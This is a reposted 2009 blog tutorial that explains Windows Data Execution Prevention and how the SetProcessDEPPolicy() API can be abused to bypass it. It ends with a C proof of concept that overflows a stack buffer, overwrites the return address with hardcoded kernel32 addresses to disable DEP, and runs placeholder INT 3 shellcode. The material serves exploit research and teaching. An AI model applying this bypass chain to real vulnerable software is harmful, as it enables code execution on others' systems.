DEP bypass with SetProcessDEPPolicy()

[Nytro]

DEP bypass with SetProcessDEPPolicy()

Data Execution Prevention (DEP) was introduced in Windows XP SP2 and is included in Windows XP Tablet PC Edition 2005, Windows Server 2003 Service Pack 1 and later, Windows Vista Service Pack 0 and later, and Windows Server 2008 Service Pack 0 and later, and all newer versions of Windows.

Hardware-enforced DEP, for CPUs that support NX (AMD) or XD (Intel) bits, enforces non-executable pages, basically it marks the stack/part of the stack as non-executable, thus preventing the execution of arbitrary shellcode residing on the stack. When the processor/system has NX/XD support/enabled, then Windows DEP is hardware DEP.

Compilers such as Visual Studio C++ offer a link flag (/NXCOMPAT) that will enable applications for DEP protection. It's enabled by default since it was introduced in Visual Studio 2005.

DEP can be circumvented in a number of ways by an attacker while exploiting a buffer overflow vulnerability to successfully achieve arbitrary command execution or, generally speaking, "successful shellcode run" when it resides on the stack. Some of these techniques are:

• Return-to-libc with a call to WinExec() widely covered in many papers and slides.
  
• ZwProtectVirtualMemory researched and explained on John's blog.
  
• NtSetInformationProcess initially researched by skape and Skywing and explained in an Uninformed article titled Bypassing Windows Hardware-enforced Data Execution Prevention. This is the widely known and used technique in most of publicly available exploits that bypass hardware-enforced DEP.
  
• SetProcessDEPPolicy, discussed in this blog post.
  

SetProcessDEPPolicy() API has been "silently" added to Windows Vista SP1, Windows XP SP3 and Windows Server 2008.

Michael Howard wrote a post on his blog back in early 2009 on how to use this function to set DEP for the current process from a developer perspective; I found it fairly well documented on MSDN too. It has also been mentioned back in summer 2008 by Alexander Sotirov and Mark Dowd in their Black Hat USA presentation titled Bypassing Browser Memory Protections.

Apart from these references, I did not find on the Internet any proof of concept demonstrating in practice how to abuse this API while exploiting a buffer overflow vulnerability to bypass hardware-enforced DEP so I wrote the following proof of concept and hope it might be of help to other people too. In my opinion this technique is the simplest among the ones I have mentioned: it does not require any stack or registers alignment to be in place before the function is called. The only drawback is that it is not supported on Windows 2003

My test environment is a Windows XP Professional SP3 English updated on December 9, 2009 with DEP manually set to OptOut so enabled for all processes except the ones that are put in the exception list and the following proof of concept is not.

DEP manually set to OptOut on Windows XP with no exceptions

The source code has been compiled with Microsoft Visual C++ 2008 Express Edition in Release mode with the default flags. This includes /NXCOMPAT and /GS flags.

Buffer Security Check (stack cookie, /GS flag) does not need to be bypassed in this specific case because the string buffer that we are going to overflow, buf, is long 4 bytes, so the compiler does not add the stack cookie to the useSetProcessDEPPolicy() function for performance reasons. Remember that strict_gs_check pragma by default is turned off.

The following screenshot of Immunity Debugger shows that the shellcode (INT 3 instruction only in this PoC) has been successfully executed after DEP has been disabled abusing SetProcessDEPPolicy().

If DEP was not disabled, an Access Memory Violation would have been raised and the process would have been terminated.

Follows the proof of concept:

/*

This is a proof of concept of buffer overflow exploitation with DEP

bypass on Windows XP Professional SP3 english updated on December 9,

2009 with DEP manually set to OptOut so enabled for all processes,

except the ones that are put in the exception list and this program

is not.

This source has been compiled with Microsoft Visual C++ 2008 Express

Edition in Release mode with the default flags. This includes

/NXCOMPAT and /GS.

Buffer Security Check (stack cookie, /GS flag) does not need to be

bypassed because the string buffer, buf, in this example is long

4 bytes, so the compiler does not add the GS cookie to the

useSetProcessDEPPolicy() function. Remember that strict_gs_check

pragma by default is turned off.

References:

* 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows

Server 2008' by Michael Howard,

http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx

* SetProcessDEPPolicy Function,

http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx

Feel free to write me for comments and questions,

Bernardo Damele A. G. <bernardo.damele@gmail.com>

*/

#include <windows.h>

#include <stdlib.h>

void useSetProcessDEPPolicy()

{

char buf[4];

/* Overflow the string buffer and EBP register. */

strcpy(buf, "AAAABBBB");

/* SetProcessDEPPolicy() API has been added to Windows Vista SP1,

Windows XP SP3 and Windows Server 2008 and can be abused by an

attacker while exploiting a buffer overflow vulnerability to disable

hardware-enforced DEP (NX/XD bit) for the running process.

Overwrite EIP with the address of SetProcessDepPolicy() API, which

is 0x7c8622a4 on a Windows XP SP3 English 32bit system updated on

December 9, 2009.

NOTE: You might need to adapt it depending on your system patch

level. */

memcpy(buf+8, "\xa4\x22\x86\x7c", 4);

/* Return address of SetProcessDepPolicy().

Use an address of a JMP ESP instruction in kernel32.dll to jump to our

shellcode on the top of the stack.

NOTE: You might need to adapt it depending on your system patch

level. */

memcpy(buf+12, "\x13\x44\x87\x7c", 4);

/* Argument for SetProcessDepPolicy().

0x00000000 turn off DEP for this process. */

memcpy(buf+16, "\x00\x00\x00\x00", 4);

/* The shellcode to be executed after DEP has been disabled.

For instance, a breakpoint (INT 3 instruction) to call the

debug exception handler which will pause the process. */

memcpy(buf+20, "\xcc", 1);

}

int main()

{

useSetProcessDEPPolicy();

return 0;

}

This source code can also be found here.

Posted 9th December 2009 by Bernardo Damele

Sursa: Bernardo Damele A. G.: DEP bypass with SetProcessDEPPolicy()